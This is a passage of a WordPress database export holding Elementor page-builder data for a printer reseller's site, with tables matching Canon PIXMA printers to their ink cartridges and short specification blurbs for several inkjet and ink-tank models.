(Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6932,3303,'_elementor_version','2.5.14'),(6935,3304,'_wp_page_template','template-fullwidth.php'),(6936,3304,'_elementor_edit_mode','builder'),(6937,3304,'_elementor_template_type','post'),(6938,3304,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"46\",\"right\":\"46\",\"bottom\":\"46\",\"left\":\"46\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers 